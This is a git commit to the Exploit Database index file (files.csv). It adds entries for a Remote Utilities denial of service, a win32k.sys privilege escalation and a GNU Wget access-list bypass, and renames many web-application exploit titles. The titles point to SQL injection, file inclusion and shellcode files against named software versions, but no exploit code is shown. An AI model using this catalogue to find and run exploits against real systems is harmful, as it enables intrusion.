DB: 2016-11-25

4 new exploits

Groupwise 7.0 - (mailto: scheme) Buffer Overflow (PoC)
Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)

Remote Utilities Host 6.3 - Denial of Service

Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)

GNU Wget < 1.18 - Access List Bypass / Race Condition

miniBB - 'user' Input Validation Hole
MiniBB 1.7f - 'user' Parameter SQL Injection

TR Newsportal 0.36tr1 - (poll.php) Remote File Inclusion
TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion

PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion
PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion

miniBB keyword_replacer 1.0 - (pathToFiles) File Inclusion
MiniBB keyword_replacer 1.0 - 'pathToFiles' Parameter File Inclusion

miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion
MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion

W1L3D4 philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection
W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection

miniBB 2.1 - (table) SQL Injection
MiniBB 2.1 - 'table' Parameter SQL Injection

Joovili 3.0.6 - (joovili.images.php) Remote File Disclosure
Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure
Apartment Search Script - 'listtest.php r' SQL Injection
XOOPS Module Recipe - 'detail.php id' SQL Injection
Aterr 0.9.1 - (class) Local File Inclusion (PHP5)
W1L3D4 philboard 1.0 - (philboard_reply.asp) SQL Injection
Apartment Search Script - 'listtest.php' SQL Injection
XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection
Aterr 0.9.1 - Local File Inclusion (PHP5)
W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection
KubeLance 1.6.4 - (ipn.php i) Local File Inclusion
acidcat CMS 3.4.1 - Multiple Vulnerabilities
BlogWorx 1.0 - (view.asp id) SQL Injection
Crazy Goomba 1.2.1 - 'id' SQL Injection
RedDot CMS 7.5 - (LngId) SQL Injection
TR News 2.1 - (nb) SQL Injection
KubeLance 1.6.4 - 'ipn.php' Local File Inclusion
Acidcat CMS 3.4.1 - Multiple Vulnerabilities
BlogWorx 1.0 - 'id' Parameter SQL Injection
Crazy Goomba 1.2.1 - 'id' Parameter SQL Injection
RedDot CMS 7.5 - 'LngId' Parameter SQL Injection
TR News 2.1 - 'nb' Parameter SQL Injection
E RESERV 2.1 - (index.php ID_loc) SQL Injection
Joomla! Component Filiale 1.0.4 - (idFiliale) SQL Injection
E RESERV 2.1 - 'index.php' SQL Injection
Joomla! Component Filiale 1.0.4 - 'idFiliale' Parameter SQL Injection
minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities
PostNuke Module PostSchedule - (eid) SQL Injection
MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure
PostNuke Module PostSchedule 1.0 - 'eid' Parameter SQL Injection

Siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting

PHP Forge 3 Beta 2 - 'id' SQL Injection
PHP Forge 3 Beta 2 - 'id' Parameter SQL Injection
megabbs forum 2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Jokes Site Script - 'jokes.php?catagorie' SQL Injection
FluentCMS - 'view.php sid' SQL Injection
megabbs forum 2.2 - SQL Injection / Cross-Site Scripting
Jokes Site Script - 'jokes.php' SQL Injection
FluentCMS - 'view.php' SQL Injection
Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection
Softbiz Web Host Directory Script (host_id) - SQL Injection
Joovili 3.1 - (browse.videos.php category) SQL Injection
Prozilla Hosting Index - 'cat_id' Parameter SQL Injection
Softbiz Web Host Directory Script - 'host_id' Parameter SQL Injection
Joovili 3.1 - 'browse.videos.php' SQL Injection

w1l3d4 philboard 1.2 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting

apartment search script - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
Apartment Search Script - Arbitrary File Upload / Cross-Site Scripting

Mini Web Calendar 1.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities
Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting

Prozilla Hosting Index - 'id' SQL Injection
Prozilla Hosting Index - 'id' Parameter SQL Injection

web Calendar system 3.12/3.30 - Multiple Vulnerabilities
Web Calendar System 3.12/3.30 - Multiple Vulnerabilities

Web Calendar 4.1 - (Authentication Bypass) SQL Injection
Web Calendar 4.1 - Authentication Bypass

web Calendar system 3.40 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection

KubeLance - 'profile.php?id' SQL Injection
KubeLance 1.7.6 - 'profile.php' SQL Injection

Clever Copy 2.0 - calendar.php Cross-Site Scripting
Clever Copy 2.0 - 'calendar.php' Cross-Site Scripting
Clever Copy 2.0 - results.php Multiple Parameter Cross-Site Scripting
Clever Copy 2.0 - categorysearch.php Multiple Parameter Cross-Site Scripting
Clever Copy 2.0 - 'results.php' Cross-Site Scripting
Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting
Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection
Acidcat CMS 2.1.13 - acidcat.mdb Remote Information Disclosure
Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection
Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure

ODFaq 2.1 - faq.php SQL Injection
ODFaq 2.1 - 'faq.php' SQL Injection

MiniBB 1.5 - news.php Remote File Inclusion
MiniBB 1.5 - 'news.php' Remote File Inclusion

W1L3D4 philboard 0.3 - W1L3D4_Aramasonuc.asp Cross-Site Scripting
W1L3D4 philboard 0.3 - Cross-Site Scripting

Proverbs Web Calendar 1.1 - Password Parameter SQL Injection
Proverbs Web Calendar 1.1 - 'Password' Parameter SQL Injection

Chimaera Project Aterr 0.9.1 - Multiple Local File Inclusion

miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting

miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion
MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusion

DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting

eZoneScripts Apartment Search Script - 'listtest.php' SQL Injection

miniBB 3.1 - Blind SQL Injection
MiniBB 3.1 - Blind SQL Injection

Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting
This commit is contained in:
Offensive Security 2016-11-25 05:01:20 +00:00
parent 38038a7128
commit b3a7c78388
11 changed files with 1443 additions and 92 deletions

108
files.csv
View file

@ -727,7 +727,7 @@ id,file,description,date,author,platform,type,port
5458,platforms/linux/dos/5458.txt,"Xine-Lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos,0
5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos,0
5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0
5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - (mailto: scheme) Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
5515,platforms/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",windows,dos,0
5547,platforms/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,windows,dos,0
5561,platforms/linux/dos/5561.pl,"rdesktop 1.5.0 - iso_recv_msg() Integer Underflow (PoC)",2008-05-08,"Guido Landi",linux,dos,0
5585,platforms/linux/dos/5585.pl,"rdesktop 1.5.0 - process_redirect_pdu() BSS Overflow (PoC)",2008-05-11,"Guido Landi",linux,dos,0
@ -3987,6 +3987,7 @@ id,file,description,date,author,platform,type,port
31707,platforms/windows/dos/31707.txt,"Computer Associates ARCserve Backup Discovery Service Remote - Denial of Service",2008-04-24,"Luigi Auriemma",windows,dos,0
31710,platforms/novell/dos/31710.txt,"Novell Groupwise 7.0 - HTML Injection / Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",novell,dos,0
31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 - JavaScript Code Remote Denial of Service",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0
40825,platforms/windows/dos/40825.py,"Remote Utilities Host 6.3 - Denial of Service",2016-11-24,"Peter Baris",windows,dos,0
31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0
31728,platforms/multiple/dos/31728.txt,"Call of Duty 4 1.5 - Malformed 'stats' command Denial of Service",2008-05-02,"Luigi Auriemma",multiple,dos,0
31748,platforms/windows/dos/31748.txt,"Yahoo! Assistant 3.6 - 'yNotifier.dll' ActiveX Control Memory Corruption",2008-05-06,Sowhat,windows,dos,0
@ -8163,6 +8164,7 @@ id,file,description,date,author,platform,type,port
33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0
33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)",2016-11-24,IOactive,windows,local,0
33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
@ -15094,6 +15096,7 @@ id,file,description,date,author,platform,type,port
40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0
40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15721,7 +15724,7 @@ id,file,description,date,author,platform,type,port
574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0
630,platforms/php/webapps/630.pl,"UBB.Threads 6.2.x < 6.3x - One Char Brute Force Exploit",2004-11-15,RusH,php,webapps,0
631,platforms/php/webapps/631.txt,"vBulletin - LAST.php SQL Injection",2004-11-15,anonymous,php,webapps,0
635,platforms/php/webapps/635.txt,"miniBB - 'user' Input Validation Hole",2004-11-16,anonymous,php,webapps,0
635,platforms/php/webapps/635.txt,"MiniBB 1.7f - 'user' Parameter SQL Injection",2004-11-16,anonymous,php,webapps,0
642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,cgi,webapps,0
645,platforms/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,php,webapps,0
647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,php,webapps,0
@ -16095,7 +16098,7 @@ id,file,description,date,author,platform,type,port
1779,platforms/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0
1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0
1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - (OptimisticLock) Remote Exploit",2006-05-14,rgod,php,webapps,0
1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - (poll.php) Remote File Inclusion",2006-05-15,Kacper,php,webapps,0
1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0
1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - (cart_content.php) Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0
1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - (name) SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0
1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0
@ -16275,7 +16278,7 @@ id,file,description,date,author,platform,type,port
2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0
2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0
2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - (cfg_racine) Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0
2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
2063,platforms/php/webapps/2063.txt,"ArticlesOne 07232006 - (page) Remote File Inclusion",2006-07-23,CyberLord,php,webapps,0
@ -16645,7 +16648,7 @@ id,file,description,date,author,platform,type,port
2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod 0.1.2 - Remote File Inclusion",2006-10-12,"Nima Salehi",php,webapps,0
2526,platforms/php/webapps/2526.txt,"PHPht Topsites - 'common.php' Remote File Inclusion",2006-10-12,"Mehmet Ince",php,webapps,0
2527,platforms/php/webapps/2527.c,"Invision Gallery 2.0.7 (Linux) - readfile() / SQL Injection",2006-10-12,ShadOS,php,webapps,0
2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer 1.0 - (pathToFiles) File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps,0
2528,platforms/php/webapps/2528.txt,"MiniBB keyword_replacer 1.0 - 'pathToFiles' Parameter File Inclusion",2006-10-12,Kw3[R]Ln,php,webapps,0
2529,platforms/php/webapps/2529.txt,"AFGB Guestbook 2.2 - (Htmls) Remote File Inclusion",2006-10-12,mdx,php,webapps,0
2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod 0.1.4 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0
2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox 0.0.5 - Remote File Inclusion",2006-10-12,boecke,php,webapps,0
@ -16743,7 +16746,7 @@ id,file,description,date,author,platform,type,port
2652,platforms/php/webapps/2652.htm,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,php,webapps,0
2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0
2654,platforms/php/webapps/2654.txt,"ask_rave 0.9 PR - (end.php footfile) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0
2655,platforms/php/webapps/2655.php,"miniBB 2.0.2 - (bb_func_txt.php) Remote File Inclusion",2006-10-26,Kacper,php,webapps,0
2655,platforms/php/webapps/2655.php,"MiniBB 2.0.2 - 'bb_func_txt.php' Remote File Inclusion",2006-10-26,Kacper,php,webapps,0
2656,platforms/php/webapps/2656.txt,"MiniBill 20061010 - 'menu_builder.php' File Inclusion",2006-10-26,"Mehmet Ince",php,webapps,0
2658,platforms/php/webapps/2658.php,"Light Blog Remote - Multiple Vulnerabilities",2006-10-27,BlackHawk,php,webapps,0
2659,platforms/php/webapps/2659.php,"N/X WCMS 4.1 - (nxheader.inc.php) Remote File Inclusion",2006-10-27,Kacper,php,webapps,0
@ -17539,7 +17542,7 @@ id,file,description,date,author,platform,type,port
3901,platforms/php/webapps/3901.txt,"maGAZIn 2.0 - (PHPThumb.php src) Remote File Disclosure",2007-05-11,Dj7xpl,php,webapps,0
3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 - (galeria.php lang2) Local File Inclusion",2007-05-11,Dj7xpl,php,webapps,0
3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution",2007-05-11,Dj7xpl,php,webapps,0
3905,platforms/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection",2007-05-11,gsy,asp,webapps,0
3905,platforms/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - 'W1L3D4_bolum.asp' SQL Injection",2007-05-11,gsy,asp,webapps,0
3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps,0
3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - (page.php) SQL Injection",2007-05-12,gsy,php,webapps,0
3908,platforms/php/webapps/3908.txt,"YAAP 1.5 - __autoload() Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0
@ -17934,7 +17937,7 @@ id,file,description,date,author,platform,type,port
4582,platforms/php/webapps/4582.txt,"teatro 1.6 - (basePath) Remote File Inclusion",2007-10-28,"Alkomandoz Hacker",php,webapps,0
4585,platforms/php/webapps/4585.txt,"MySpace Resource Script (MSRS) 1.21 - Remote File Inclusion",2007-10-29,r00t@zapak.com,php,webapps,0
4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0
4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) SQL Injection",2007-10-30,irk4z,php,webapps,0
4587,platforms/php/webapps/4587.txt,"MiniBB 2.1 - 'table' Parameter SQL Injection",2007-10-30,irk4z,php,webapps,0
4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0
4589,platforms/php/webapps/4589.htm,"PHP-AGTC Membership System 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps,0
4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0
@ -18090,7 +18093,7 @@ id,file,description,date,author,platform,type,port
4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - (printview.php PHPEx) Local File Inclusion",2007-12-26,irk4z,php,webapps,0
4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0
4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - (joovili.images.php) Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0
4802,platforms/php/webapps/4802.txt,"XCMS 1.82 - Local/Remote File Inclusion",2007-12-28,nexen,php,webapps,0
4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com - Database Backup Dump",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0
@ -18576,46 +18579,46 @@ id,file,description,date,author,platform,type,port
5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - 'contact.php' SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0
5469,platforms/php/webapps/5469.txt,"AllMyGuests 0.4.1 - 'AMG_id' Parameter SQL Injection",2008-04-19,Player,php,webapps,0
5470,platforms/php/webapps/5470.py,"PHP-Fusion 6.01.14 - Blind SQL Injection",2008-04-19,The:Paradox,php,webapps,0
5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php r' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0
5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe - 'detail.php id' SQL Injection",2008-04-19,S@BUN,php,webapps,0
5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - (class) Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0
5475,platforms/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - (philboard_reply.asp) SQL Injection",2008-04-20,U238,asp,webapps,0
5471,platforms/php/webapps/5471.txt,"Apartment Search Script - 'listtest.php' SQL Injection",2008-04-19,Crackers_Child,php,webapps,0
5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0
5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0
5475,platforms/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - 'philboard_reply.asp' SQL Injection",2008-04-20,U238,asp,webapps,0
5476,platforms/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0
5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0
5478,platforms/php/webapps/5478.txt,"acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0
5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - (view.asp id) SQL Injection",2008-04-21,U238,php,webapps,0
5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' SQL Injection",2008-04-21,ZoRLu,php,webapps,0
5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - (LngId) SQL Injection",2008-04-21,"IRM Plc.",asp,webapps,0
5483,platforms/php/webapps/5483.txt,"TR News 2.1 - (nb) SQL Injection",2008-04-21,His0k4,php,webapps,0
5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - 'ipn.php' Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0
5478,platforms/php/webapps/5478.txt,"Acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0
5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - 'id' Parameter SQL Injection",2008-04-21,U238,php,webapps,0
5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - 'id' Parameter SQL Injection",2008-04-21,ZoRLu,php,webapps,0
5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - 'LngId' Parameter SQL Injection",2008-04-21,"IRM Plc.",asp,webapps,0
5483,platforms/php/webapps/5483.txt,"TR News 2.1 - 'nb' Parameter SQL Injection",2008-04-21,His0k4,php,webapps,0
5484,platforms/php/webapps/5484.txt,"Joomla! Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps,0
5485,platforms/php/webapps/5485.pl,"Web Calendar 4.1 - Blind SQL Injection",2008-04-22,t0pP8uZz,php,webapps,0
5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0
5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - (index.php ID_loc) SQL Injection",2008-04-23,JIKO,php,webapps,0
5488,platforms/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - (idFiliale) SQL Injection",2008-04-23,str0xo,php,webapps,0
5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - 'index.php' SQL Injection",2008-04-23,JIKO,php,webapps,0
5488,platforms/php/webapps/5488.txt,"Joomla! Component Filiale 1.0.4 - 'idFiliale' Parameter SQL Injection",2008-04-23,str0xo,php,webapps,0
5490,platforms/php/webapps/5490.pl,"YouTube Clone Script - 'spages.php' Remote Code Execution",2008-04-23,Inphex,php,webapps,0
5491,platforms/php/webapps/5491.txt,"Joomla! Component Community Builder 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0
5493,platforms/php/webapps/5493.txt,"Joomla! Component JPad 1.0 - Authenticated SQL Injection",2008-04-24,His0k4,php,webapps,0
5494,platforms/php/webapps/5494.txt,"minibb 2.2 - (Cross-Site Scripting / SQL Injection / Full Path Disclosure) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0
5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule - (eid) SQL Injection",2008-04-25,Kacper,php,webapps,0
5494,platforms/php/webapps/5494.txt,"MiniBB 2.2 - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2008-04-25,girex,php,webapps,0
5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule 1.0 - 'eid' Parameter SQL Injection",2008-04-25,Kacper,php,webapps,0
5497,platforms/php/webapps/5497.txt,"Joomla! Component Joomla-Visites 1.1 RC2 - Remote File Inclusion",2008-04-25,NoGe,php,webapps,0
5499,platforms/php/webapps/5499.txt,"Siteman 2.x - (Code Execution / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0
5499,platforms/php/webapps/5499.txt,"Siteman 2.x - Code Execution / Local File Inclusion / Cross-Site Scripting",2008-04-26,"Khashayar Fereidani",php,webapps,0
5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames 2.5 - SQL Injection",2008-04-26,Kacper,php,webapps,0
5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - Remote File Inclusion",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0
5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - 'postview.php' SQL Injection (1)",2008-04-26,U238,php,webapps,0
5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple SQL Injections",2008-04-26,U238,asp,webapps,0
5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' SQL Injection",2008-04-26,JIKO,php,webapps,0
5504,platforms/php/webapps/5504.txt,"PHP Forge 3 Beta 2 - 'id' Parameter SQL Injection",2008-04-26,JIKO,php,webapps,0
5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 - SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0
5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0
5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0
5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php?catagorie' SQL Injection",2008-04-27,ProgenTR,php,webapps,0
5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php sid' SQL Injection",2008-04-27,cO2,php,webapps,0
5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - SQL Injection / Cross-Site Scripting",2008-04-27,BugReport.IR,asp,webapps,0
5508,platforms/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php' SQL Injection",2008-04-27,ProgenTR,php,webapps,0
5509,platforms/php/webapps/5509.txt,"FluentCMS - 'view.php' SQL Injection",2008-04-27,cO2,php,webapps,0
5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0
5512,platforms/php/webapps/5512.pl,"Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0
5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0
